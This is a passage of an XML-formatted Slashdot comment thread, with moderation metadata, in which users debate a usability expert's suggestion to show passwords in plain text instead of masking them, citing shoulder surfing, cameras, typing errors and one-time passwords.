<sentencetext>I can't think why we need this (standard) security measure, so let's drop it.If you can't think of a reason we need it, and you keep it, then isn't that security theater?
	</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471163</id>
	<title>Utterly absurd!</title>
	<author>kheldan</author>
	<datestamp>1245920700000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>The average person, unless you put a gun to their head and MAKE them do differently, will choose a password that an 8-year-old can guess, and he wants to make it <i>easier</i> for unauthorized people to see whole or partial passwords? Rediculous. Not that it matters all that much, I guess, since the average person also treats network security like a joke, and lets co-workers have their password regardless of what policy is.</htmltext>
<tokenext>The average person , unless you put a gun to their head and MAKE them do differently , will choose a password that an 8-year-old can guess , and he wants to make it easier for unauthorized people to see whole or partial passwords ?
Rediculous. Not that it matters all that much , I guess , since the average person also treats network security like a joke , and lets co-workers have their password regardless of what policy is .</tokentext>
<sentencetext>The average person, unless you put a gun to their head and MAKE them do differently, will choose a password that an 8-year-old can guess, and he wants to make it easier for unauthorized people to see whole or partial passwords?
Rediculous. Not that it matters all that much, I guess, since the average person also treats network security like a joke, and lets co-workers have their password regardless of what policy is.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471285</id>
	<title>Re:One word for Nielsen: Projector</title>
	<author>Anonymous</author>
	<datestamp>1245921060000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Exactly.  Likewise, it would completely change how people come up with their passwords if they knew someone might see them.  A coworker once had to give me her password so I could grab a file for her.  Keep in mind, trust and confidentiality isn't an issue here.</p><p>I ask "What's your password."<br>Silence.<br>I ask again "What's your password."<br>"Ummm . .<nobr> <wbr></nobr>."<br>I ask a third time, telling her she can change it as soon as she gets in.  She hesitates and finally breaks down:<br>"It's 'mrpuddypaws'." (or something like that about her cat)</p><p>I could hear the shame in her voice.</p></htmltext>
<tokenext>Exactly .
Likewise , it would completely change how people come up with their passwords if they knew someone might see them .
A coworker once had to give me her password so I could grab a file for her .
Keep in mind , trust and confidentiality is n't an issue here.I ask " What 's your password .
" Silence.I ask again " What 's your password .
" " Ummm .
. .
" I ask a third time , telling her she can change it as soon as she gets in .
She hesitates and finally breaks down : " It 's 'mrpuddypaws' .
" ( or something like that about her cat ) I could hear the shame in her voice .</tokentext>
<sentencetext>Exactly.
Likewise, it would completely change how people come up with their passwords if they knew someone might see them.
A coworker once had to give me her password so I could grab a file for her.
Keep in mind, trust and confidentiality isn't an issue here.I ask "What's your password.
"Silence.I ask again "What's your password.
""Ummm .
. .
"I ask a third time, telling her she can change it as soon as she gets in.
She hesitates and finally breaks down:"It's 'mrpuddypaws'.
" (or something like that about her cat)I could hear the shame in her voice.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470993</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471459</id>
	<title>Re:One word for Nielsen: Projector</title>
	<author>cockpitcomp</author>
	<datestamp>1245921600000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>No. Neither have 99.99\% of the people in this world.</htmltext>
<tokenext>No .
Neither have 99.99 \ % of the people in this world .</tokentext>
<sentencetext>No.
Neither have 99.99\% of the people in this world.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470993</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470985</id>
	<title>Biometric scanners</title>
	<author>Anonymous</author>
	<datestamp>1245963240000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I look forward to a future where all computers have biometric equipment and project-natal-esque face recognition SO I NEVER NEED TO REMEMBER ANOTHER PASSWORD AGAIN!</htmltext>
<tokenext>I look forward to a future where all computers have biometric equipment and project-natal-esque face recognition SO I NEVER NEED TO REMEMBER ANOTHER PASSWORD AGAIN !</tokentext>
<sentencetext>I look forward to a future where all computers have biometric equipment and project-natal-esque face recognition SO I NEVER NEED TO REMEMBER ANOTHER PASSWORD AGAIN!</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471521</id>
	<title>easy</title>
	<author>Anonymous</author>
	<datestamp>1245921780000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>What people don;t remember Shoulder Surfing?</p></htmltext>
<tokenext>What people don ; t remember Shoulder Surfing ?</tokentext>
<sentencetext>What people don;t remember Shoulder Surfing?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471547</id>
	<title>maybe he has a point</title>
	<author>rhaacke</author>
	<datestamp>1245921900000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Over the shoulder attacks aren't much harder without the password being echoed. Just watch the keyboard instead of the screen. Systems could be set up to clear the password if no typing is done before a short timeout has expired. This would greatly reduce typos while probably only reducing security by a small amount. This might be a good topic for a small research project. At the least it should be looked into before being dismissed.</htmltext>
<tokenext>Over the shoulder attacks are n't much harder without the password being echoed .
Just watch the keyboard instead of the screen .
Systems could be set up to clear the password if no typing is done before a short timeout has expired .
This would greatly reduce typos while probably only reducing security by a small amount .
This might be a good topic for a small research project .
At the least it should be looked into before being dismissed .</tokentext>
<sentencetext>Over the shoulder attacks aren't much harder without the password being echoed.
Just watch the keyboard instead of the screen.
Systems could be set up to clear the password if no typing is done before a short timeout has expired.
This would greatly reduce typos while probably only reducing security by a small amount.
This might be a good topic for a small research project.
At the least it should be looked into before being dismissed.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28484011</id>
	<title>Android password dialogs</title>
	<author>skyphyr</author>
	<datestamp>1246036080000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Android had a nice half-way option for this. When you type a password in the last character you typed
appears and the rest are bullets. It can be turned off so it's all bullets. This way you have feedback on
what you typed without completely losing security. Some of the dialogs also have a show password
option. So if you really want to you can let other steal your password more easily...</htmltext>
<tokenext>Android had a nice half-way option for this .
When you type a password in the last character you typed appears and the rest are bullets .
It can be turned off so it 's all bullets .
This way you have feedback on what you typed without completely losing security .
Some of the dialogs also have a show password option .
So if you really want to you can let other steal your password more easily.. .</tokentext>
<sentencetext>Android had a nice half-way option for this.
When you type a password in the last character you typed
appears and the rest are bullets.
It can be turned off so it's all bullets.
This way you have feedback on
what you typed without completely losing security.
Some of the dialogs also have a show password
option.
So if you really want to you can let other steal your password more easily...</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473523</id>
	<title>Re:Windows wireless WAP / WEP</title>
	<author>limaxray</author>
	<datestamp>1245929040000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I wish I had mod points because I agree with you completely - I am forced to announce my burning hatred of Windows every time I have to blindly enter my 40+ character WPA password into an XP machine... twice.<br> <br>My biggest gripe is, why do I need to hide my wifi password anyway?  If someone can get close enough to me to be able to read the key on my screen, why would I care if they access my wireless?  I just can't think of a single instance of not wanting my WPA key to be shown.</htmltext>
<tokenext>I wish I had mod points because I agree with you completely - I am forced to announce my burning hatred of Windows every time I have to blindly enter my 40 + character WPA password into an XP machine... twice. My biggest gripe is , why do I need to hide my wifi password anyway ?
If someone can get close enough to me to be able to read the key on my screen , why would I care if they access my wireless ?
I just ca n't think of a single instance of not wanting my WPA key to be shown .</tokentext>
<sentencetext>I wish I had mod points because I agree with you completely - I am forced to announce my burning hatred of Windows every time I have to blindly enter my 40+ character WPA password into an XP machine... twice. My biggest gripe is, why do I need to hide my wifi password anyway?
If someone can get close enough to me to be able to read the key on my screen, why would I care if they access my wireless?
I just can't think of a single instance of not wanting my WPA key to be shown.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471407</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471357</id>
	<title>Re:Ever looked at your password?</title>
	<author>carleton</author>
	<datestamp>1245921300000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>I also type (most) passwords purely by muscle memory (and have had to type a couple of shared passwords into wordpad so I can actually say what it is I've been typing (mostly for where shift is and isn't toggled)... but having said that, I've gotten multiple accounts locked out due to the following reasons:<br>
&nbsp; &nbsp; Gorram cap lock (as annoying as the popup is, that's something MS got right imho)<br>
&nbsp; &nbsp; Pseudo-cap lock... not sure if MS would have detected it (it was through a web interface), but somehow the KVM I was using stopped detecting shift/control and there was no feedback that this was a problem as my username is all lower case<br>
&nbsp; &nbsp; Shitty dell keyboard on one laptop only detects one letter (which of course appears several times in the passphrase) about 30\% of the time... yeah, I can count *'s, but that's a pita given the muscle memory above<br>
&nbsp; &nbsp; Probably also, a long time ago, at least got the password wrong once when switching between old school apple and IBM keyboards (f and j have dots on PC, d and k have dots on MAC, put my hands in wrong spot)</p><p>There's also the story about the guy who could type his password sitting but not standing... the story goes that while sitting, he touch typed, while standing he hunted and pecked and someone had swapped a couple of keys on the keyboard that wouldn't be noticed while touch typing but would when looking at the keyboard</p><p>As far as shoulder surfing goes, if someone is going to be hunting and pecking the password anyways, it would seem to be almost as easy for a shoulder surfer to watch your fingers hit keys as it would be to read the password off the screen... especially if you use leetspelling for passwords.</p></htmltext>
<tokenext>I also type ( most ) passwords purely by muscle memory ( and have had to type a couple of shared passwords into wordpad so I can actually say what it is I 've been typing ( mostly for where shift is and is n't toggled ) ... but having said that , I 've gotten multiple accounts locked out due to the following reasons :     Gorram cap lock ( as annoying as the popup is , that 's something MS got right imho )     Pseudo-cap lock... not sure if MS would have detected it ( it was through a web interface ) , but somehow the KVM I was using stopped detecting shift/control and there was no feedback that this was a problem as my username is all lower case     Shitty dell keyboard on one laptop only detects one letter ( which of course appears several times in the passphrase ) about 30 \ % of the time... yeah , I can count * 's , but that 's a pita given the muscle memory above     Probably also , a long time ago , at least got the password wrong once when switching between old school apple and IBM keyboards ( f and j have dots on PC , d and k have dots on MAC , put my hands in wrong spot ) There 's also the story about the guy who could type his password sitting but not standing... the story goes that while sitting , he touch typed , while standing he hunted and pecked and someone had swapped a couple of keys on the keyboard that would n't be noticed while touch typing but would when looking at the keyboardAs far as shoulder surfing goes , if someone is going to be hunting and pecking the password anyways , it would seem to be almost as easy for a shoulder surfer to watch your fingers hit keys as it would be to read the password off the screen... especially if you use leetspelling for passwords .</tokentext>
<sentencetext>I also type (most) passwords purely by muscle memory (and have had to type a couple of shared passwords into wordpad so I can actually say what it is I've been typing (mostly for where shift is and isn't toggled)... but having said that, I've gotten multiple accounts locked out due to the following reasons:
    Gorram cap lock (as annoying as the popup is, that's something MS got right imho)
    Pseudo-cap lock... not sure if MS would have detected it (it was through a web interface), but somehow the KVM I was using stopped detecting shift/control and there was no feedback that this was a problem as my username is all lower case
    Shitty dell keyboard on one laptop only detects one letter (which of course appears several times in the passphrase) about 30\% of the time... yeah, I can count *'s, but that's a pita given the muscle memory above
    Probably also, a long time ago, at least got the password wrong once when switching between old school apple and IBM keyboards (f and j have dots on PC, d and k have dots on MAC, put my hands in wrong spot)There's also the story about the guy who could type his password sitting but not standing... the story goes that while sitting, he touch typed, while standing he hunted and pecked and someone had swapped a couple of keys on the keyboard that wouldn't be noticed while touch typing but would when looking at the keyboardAs far as shoulder surfing goes, if someone is going to be hunting and pecking the password anyways, it would seem to be almost as easy for a shoulder surfer to watch your fingers hit keys as it would be to read the password off the screen... especially if you use leetspelling for passwords.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470977</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471553</id>
	<title>Re:Not to fanboi all over the place...</title>
	<author>strimpster</author>
	<datestamp>1245921900000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>You know, I'm not quite sure that will work on non-mobile/non-touch screen devices too well. The average slashdotter (and anyone growing up in the modern generations) most likely types too fast for that to even really register in their brain as the letters turn to asterisks too quickly. I think that hen peckers are the only ones who would really gain any advantage out of that. That is why it is so successful on the iPhone, you have no choice but to hen peck.</htmltext>
<tokenext>You know , I 'm not quite sure that will work on non-mobile/non-touch screen devices too well .
The average slashdotter ( and anyone growing up in the modern generations ) most likely types too fast for that to even really register in their brain as the letters turn to asterisks too quickly .
I think that hen peckers are the only ones who would really gain any advantage out of that .
That is why it is so successful on the iPhone , you have no choice but to hen peck .</tokentext>
<sentencetext>You know, I'm not quite sure that will work on non-mobile/non-touch screen devices too well.
The average slashdotter (and anyone growing up in the modern generations) most likely types too fast for that to even really register in their brain as the letters turn to asterisks too quickly.
I think that hen peckers are the only ones who would really gain any advantage out of that.
That is why it is so successful on the iPhone, you have no choice but to hen peck.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470909</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28482069</id>
	<title>Re:Two words</title>
	<author>Cro Magnon</author>
	<datestamp>1246030020000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><blockquote><div><p>When was the last time someone stood close enough to read your password and you didn't know they where there?</p></div></blockquote><p>Yesterday.  I knew they were there, but it was more trouble than it was worth to ask them to stand facing out while I was typing.  I don't THINK they were looking, but I was looking at the keyboard, not at them.  And the screen was a lot more visible from where they were standing than my keyboard was.</p></div>
	</htmltext>
<tokenext>When was the last time someone stood close enough to read your password and you did n't know they where there ? Yesterday .
I knew they were there , but it was more trouble than it was worth to ask them to stand facing out while I was typing .
I do n't THINK they were looking , but I was looking at the keyboard , not at them .
And the screen was a lot more visible from where they were standing than my keyboard was .</tokentext>
<sentencetext>When was the last time someone stood close enough to read your password and you didn't know they where there?Yesterday.
I knew they were there, but it was more trouble than it was worth to ask them to stand facing out while I was typing.
I don't THINK they were looking, but I was looking at the keyboard, not at them.
And the screen was a lot more visible from where they were standing than my keyboard was.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471191</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476047</id>
	<title>Re:Two words</title>
	<author>ewanm89</author>
	<datestamp>1245940620000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>This is where slashdot's approach of remembering authentication cookie and having that public terminal checkbox to tell it not to in public places work fine.</htmltext>
<tokenext>This is where slashdot 's approach of remembering authentication cookie and having that public terminal checkbox to tell it not to in public places work fine .</tokentext>
<sentencetext>This is where slashdot's approach of remembering authentication cookie and having that public terminal checkbox to tell it not to in public places work fine.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471193</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471769</id>
	<title>Personally...</title>
	<author>musicalmicah</author>
	<datestamp>1245922560000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I freak the hell out whenever I start typing a password and suddenly realize I'm typing in an unmasked textbox.</htmltext>
<tokenext>I freak the hell out whenever I start typing a password and suddenly realize I 'm typing in an unmasked textbox .</tokentext>
<sentencetext>I freak the hell out whenever I start typing a password and suddenly realize I'm typing in an unmasked textbox.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476217</id>
	<title>Re:Two words</title>
	<author>merreborn</author>
	<datestamp>1245941700000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><blockquote><div><blockquote><div><p>More importantly, there's usually nobody looking over your shoulder when you log in to a website. It's just you, sitting all alone in your office, suffering reduced usability to protect against a non-issue.</p></div></blockquote><p>Not all of us have those nice cushy jobs Mr. Nielsen has, where we have our very own office. Roughly 99.9993\% of office workers have colleagues. I guess Mr. Nielsen is just a tad detached from reality here.</p></div></blockquote><p>When you put it that way, it starts to sound like this article may have been inspired by a specific episode in which Mr. Nielsen experienced difficulty typing in his own password.</p><p><i>"Damnit, again!?  It's these damn fucking asterisks!  I can't even see what I'm fucking typing!"</i></p></div>
	</htmltext>
<tokenext>More importantly , there 's usually nobody looking over your shoulder when you log in to a website .
It 's just you , sitting all alone in your office , suffering reduced usability to protect against a non-issue.Not all of us have those nice cushy jobs Mr. Nielsen has , where we have our very own office .
Roughly 99.9993 \ % of office workers have colleagues .
I guess Mr. Nielsen is just a tad detached from reality here.When you put it that way , it starts to sound like this article may have been inspired by a specific episode in which Mr. Nielsen experienced difficulty typing in his own password .
" Damnit , again ! ?
It 's these damn fucking asterisks !
I ca n't even see what I 'm fucking typing !
"</tokentext>
<sentencetext>More importantly, there's usually nobody looking over your shoulder when you log in to a website.
It's just you, sitting all alone in your office, suffering reduced usability to protect against a non-issue.Not all of us have those nice cushy jobs Mr. Nielsen has, where we have our very own office.
Roughly 99.9993\% of office workers have colleagues.
I guess Mr. Nielsen is just a tad detached from reality here.When you put it that way, it starts to sound like this article may have been inspired by a specific episode in which Mr. Nielsen experienced difficulty typing in his own password.
"Damnit, again!?
It's these damn fucking asterisks!
I can't even see what I'm fucking typing!
"
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471225</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471513</id>
	<title>Re:hunter2</title>
	<author>MightyMartian</author>
	<datestamp>1245921780000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>If Stephen Hawking said "Black holes make the best ice cream", yes, I'd want a citation.  The reason for obscuring passwords is to make over-the-shoulder spying much more difficult.  Yes, it makes a user's life a little harder, but that's the tradeoff of security.  I'm sure an unsecured system would be far easier than one that requires a password to get into it or to do certain things requiring elevation, but that's the game.</p></htmltext>
<tokenext>If Stephen Hawking said " Black holes make the best ice cream " , yes , I 'd want a citation .
The reason for obscuring passwords is to make over-the-shoulder spying much more difficult .
Yes , it makes a user 's life a little harder , but that 's the tradeoff of security .
I 'm sure an unsecured system would be far easier than one that requires a password to get into it or to do certain things requiring elevation , but that 's the game .</tokentext>
<sentencetext>If Stephen Hawking said "Black holes make the best ice cream", yes, I'd want a citation.
The reason for obscuring passwords is to make over-the-shoulder spying much more difficult.
Yes, it makes a user's life a little harder, but that's the tradeoff of security.
I'm sure an unsecured system would be far easier than one that requires a password to get into it or to do certain things requiring elevation, but that's the game.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472139</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>Anonymous</author>
	<datestamp>1245923640000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>While what you said is true, its a corner case. Not many people would go to the trouble of any of the methods you described. Using password masking stops 99\% of the population from learning a password (accidentally or otherwise) while shouldersurfing.</p></htmltext>
<tokenext>While what you said is true , its a corner case .
Not many people would go to the trouble of any of the methods you described .
Using password masking stops 99 \ % of the population from learning a password ( accidentally or otherwise ) while shouldersurfing .</tokentext>
<sentencetext>While what you said is true, its a corner case.
Not many people would go to the trouble of any of the methods you described.
Using password masking stops 99\% of the population from learning a password (accidentally or otherwise) while shouldersurfing.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28482273</id>
	<title>Re:But then you might see that their password is</title>
	<author>Cro Magnon</author>
	<datestamp>1246030620000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>LoL!  I just got yet another password to worry about, and guess what the default was!  And no, I didn't get to keep the default.</p></htmltext>
<tokenext>LoL !
I just got yet another password to worry about , and guess what the default was !
And no , I did n't get to keep the default .</tokentext>
<sentencetext>LoL!
I just got yet another password to worry about, and guess what the default was!
And no, I didn't get to keep the default.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470967</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472469</id>
	<title>waa?</title>
	<author>g33kclimb3r</author>
	<datestamp>1245924720000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Yea really... what makes someone an expert in usability?? Usability is up to the consumers and users. Personally the only time I have ever failed to log in is because I forgot the password.. Honestly it is kinda sad if you give up trying to log in if you can't type in the correct password.</htmltext>
<tokenext>Yea really... what makes someone an expert in usability ? ?
Usability is up to the consumers and users .
Personally the only time I have ever failed to log in is because I forgot the password.. Honestly it is kinda sad if you give up trying to log in if you ca n't type in the correct password .</tokentext>
<sentencetext>Yea really... what makes someone an expert in usability??
Usability is up to the consumers and users.
Personally the only time I have ever failed to log in is because I forgot the password.. Honestly it is kinda sad if you give up trying to log in if you can't type in the correct password.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471197</id>
	<title>Re:Easy solution</title>
	<author>Anonymous</author>
	<datestamp>1245920760000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Why should I change my password to hunter2?</p></htmltext>
<tokenext>Why should I change my password to hunter2 ?</tokentext>
<sentencetext>Why should I change my password to hunter2?</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470979</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472099</id>
	<title>Re:Indeed lack of imagination</title>
	<author>javelinco</author>
	<datestamp>1245923460000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Good for you. Have you ever considered that you aren't in the majority? If not, I'd suggest that you start considering that question EVERY SINGLE TIME you start thinking to yourself something that starts with "But I..."<br> <br>

Repeat it with me:<br> <br>

YOU ARE NOT IN THE MAJORITY!<br>
YOU ARE NOT IN THE MAJORITY!<br>
YOU ARE NOT IN THE MAJORITY!<br>
YOU ARE NOT IN THE MAJORITY!<br>
YOU ARE NOT IN THE MAJORITY!</htmltext>
<tokenext>Good for you .
Have you ever considered that you are n't in the majority ?
If not , I 'd suggest that you start considering that question EVERY SINGLE TIME you start thinking to yourself something that starts with " But I... " Repeat it with me : YOU ARE NOT IN THE MAJORITY !
YOU ARE NOT IN THE MAJORITY !
YOU ARE NOT IN THE MAJORITY !
YOU ARE NOT IN THE MAJORITY !
YOU ARE NOT IN THE MAJORITY !</tokentext>
<sentencetext>Good for you.
Have you ever considered that you aren't in the majority?
If not, I'd suggest that you start considering that question EVERY SINGLE TIME you start thinking to yourself something that starts with "But I..." 

Repeat it with me: 

YOU ARE NOT IN THE MAJORITY!
YOU ARE NOT IN THE MAJORITY!
YOU ARE NOT IN THE MAJORITY!
YOU ARE NOT IN THE MAJORITY!
YOU ARE NOT IN THE MAJORITY!</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471509</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473607</id>
	<title>He forgets stupid programmers</title>
	<author>roemcke</author>
	<datestamp>1245929460000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Normal text-entry widgets and password boxes have different usability and security requirements. For instance, you don't want your webrowser to show a dropdown list of all your passwords as plain text. As soon as both widgets look mostly the same you can be quite sure half of the website programmers out there starts using the wrong widget.</p></htmltext>
<tokenext>Normal text-entry widgets and password boxes have different usability and security requirements .
For instance , you do n't want your webrowser to show a dropdown list of all your passwords as plain text .
As soon as both widgets look mostly the same you can be quite sure half of the website programmers out there starts using the wrong widget .</tokentext>
<sentencetext>Normal text-entry widgets and password boxes have different usability and security requirements.
For instance, you don't want your webrowser to show a dropdown list of all your passwords as plain text.
As soon as both widgets look mostly the same you can be quite sure half of the website programmers out there starts using the wrong widget.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471925</id>
	<title>Re:Two words</title>
	<author>Znork</author>
	<datestamp>1245923040000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p><i>Offering a default to turn OFF password masking for bank accounts?</i></p><p>As many banks use one time passwords, that might actually be one of the few places where unmasked passwords are acceptable.</p><p>Otherwise, no way. For those with very bad keyboard skills there are workarounds like using keyboard patterns and with cellphones you can use longer passwords but without multiple-click use of buttons.</p><p>Slightly easier input simply isn't worth it; not only don't I want to reveal my passwords to any furtive glance, I don't want to be exposed to everyone elses passwords either.</p></htmltext>
<tokenext>Offering a default to turn OFF password masking for bank accounts ? As many banks use one time passwords , that might actually be one of the few places where unmasked passwords are acceptable.Otherwise , no way .
For those with very bad keyboard skills there are workarounds like using keyboard patterns and with cellphones you can use longer passwords but without multiple-click use of buttons.Slightly easier input simply is n't worth it ; not only do n't I want to reveal my passwords to any furtive glance , I do n't want to be exposed to everyone elses passwords either .</tokentext>
<sentencetext>Offering a default to turn OFF password masking for bank accounts?As many banks use one time passwords, that might actually be one of the few places where unmasked passwords are acceptable.Otherwise, no way.
For those with very bad keyboard skills there are workarounds like using keyboard patterns and with cellphones you can use longer passwords but without multiple-click use of buttons.Slightly easier input simply isn't worth it; not only don't I want to reveal my passwords to any furtive glance, I don't want to be exposed to everyone elses passwords either.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28479607</id>
	<title>Re:Windows wireless WAP / WEP</title>
	<author>Anonymous</author>
	<datestamp>1246014180000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Take the key, CTRL-V to notepad.  CTRL-C and CTRL-V to both of the key fields...  much less error prone.</p></htmltext>
<tokenext>Take the key , CTRL-V to notepad .
CTRL-C and CTRL-V to both of the key fields... much less error prone .</tokentext>
<sentencetext>Take the key, CTRL-V to notepad.
CTRL-C and CTRL-V to both of the key fields...  much less error prone.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471407</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28484675</id>
	<title>Re:Indeed lack of imagination</title>
	<author>Hognoxious</author>
	<datestamp>1246038480000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><blockquote><div><p>Give me a dSLR and a decent set of long distance lenses</p></div></blockquote><p>Specialised macro lenses aside, all camera lenses have a range of infinity.</p></div>
	</htmltext>
<tokenext>Give me a dSLR and a decent set of long distance lensesSpecialised macro lenses aside , all camera lenses have a range of infinity .</tokentext>
<sentencetext>Give me a dSLR and a decent set of long distance lensesSpecialised macro lenses aside, all camera lenses have a range of infinity.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28483271</id>
	<title>Masking passwords</title>
	<author>bpowell99</author>
	<datestamp>1246033500000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Obvoiusly this guy has never used a Kiosk or sat at Starbucks. Shoudlder surfing is bad enough, but every public place has survielence cameras, and web cams are cheap enough and small enough to leave a few pointing at likely places. If the password is shown on the screen, it is also on a video somewhere as well. Now if we went to one-time passwords, then echoing the password wouldn't be a problem, but as long as we keep replayable passwords, I don't want it echoed back to the sceen.</p></htmltext>
<tokenext>Obvoiusly this guy has never used a Kiosk or sat at Starbucks .
Shoudlder surfing is bad enough , but every public place has survielence cameras , and web cams are cheap enough and small enough to leave a few pointing at likely places .
If the password is shown on the screen , it is also on a video somewhere as well .
Now if we went to one-time passwords , then echoing the password would n't be a problem , but as long as we keep replayable passwords , I do n't want it echoed back to the sceen .</tokentext>
<sentencetext>Obvoiusly this guy has never used a Kiosk or sat at Starbucks.
Shoudlder surfing is bad enough, but every public place has survielence cameras, and web cams are cheap enough and small enough to leave a few pointing at likely places.
If the password is shown on the screen, it is also on a video somewhere as well.
Now if we went to one-time passwords, then echoing the password wouldn't be a problem, but as long as we keep replayable passwords, I don't want it echoed back to the sceen.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473791</id>
	<title>Re:hunter2</title>
	<author>Rockoon</author>
	<datestamp>1245930300000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>The problem isnt remembering one 6-8 character password.<br>
<br>
The problem is that they are typically forced to change it each and every month. That digit you were talking about.. yeah.. it goes 1 on the first incarnation of the password, then 2 on the second, 3 on the third...</htmltext>
<tokenext>The problem isnt remembering one 6-8 character password .
